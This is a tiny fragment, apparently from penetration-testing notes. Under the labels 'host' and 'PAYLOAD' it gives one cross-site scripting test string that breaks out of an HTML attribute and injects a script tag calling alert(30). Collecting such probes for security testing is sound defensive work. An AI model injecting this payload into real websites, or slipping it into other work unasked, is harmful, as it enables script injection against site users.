host

PAYLOAD
"><script>alert(30)</script>

#################################################################################